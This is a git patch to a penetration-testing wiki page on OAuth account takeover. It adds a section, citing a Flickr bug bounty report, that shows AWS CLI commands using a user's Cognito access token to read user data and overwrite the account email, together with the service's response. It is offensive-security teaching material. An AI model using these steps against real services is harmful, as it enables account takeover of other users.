From e10010e9f4f2694340e49a63bad430e7c44da2ff Mon Sep 17 00:00:00 2001 From: CPol Date: Thu, 30 Dec 2021 09:58:38 +0000 Subject: [PATCH] GitBook: [#2927] No subject --- pentesting-web/oauth-to-account-takeover.md | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) diff --git a/pentesting-web/oauth-to-account-takeover.md b/pentesting-web/oauth-to-account-takeover.md index 97c65f02f..41d0e9be6 100644 --- a/pentesting-web/oauth-to-account-takeover.md +++ b/pentesting-web/oauth-to-account-takeover.md @@ -155,6 +155,27 @@ The **authorization code should live just for some time to limit the time window If you can get the **authorization code and use it with a different client then you can takeover other accounts**. +### AWS Cognito + +In this bug bounty report: [**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) **** you can see that the **token** that **AWS Cognito** gives back to the user might have **enough permissions to overwrite the user data**. Therefore, if you can **change the user email for a different user email**, you might be able to **take over** others accounts. + +``` +# Read info of the user +aws cognito-idp get-user --region us-east-1 --access-token eyJraWQiOiJPVj[...] + +# Change email address +aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ[...] --user-attributes Name=email,Value=imaginary@flickr.com +{ + "CodeDeliveryDetailsList": [ + { + "Destination": "i***@f***.com", + "DeliveryMedium": "EMAIL", + "AttributeName": "email" + } + ] +} +``` + ### SSRFs parameters One of the hidden URLs that you may miss is the **Dynamic Client Registration endpoint**. In order to successfully authenticate users, OAuth servers need to know details about the client application, such as the "client\_name", "client\_secret", "redirect\_uris", and so on. These details can be provided via local configuration, but OAuth authorization servers may also have a **special registration endpoint**. This endpoint is normally mapped to "/register" and accepts POST requests with the following format: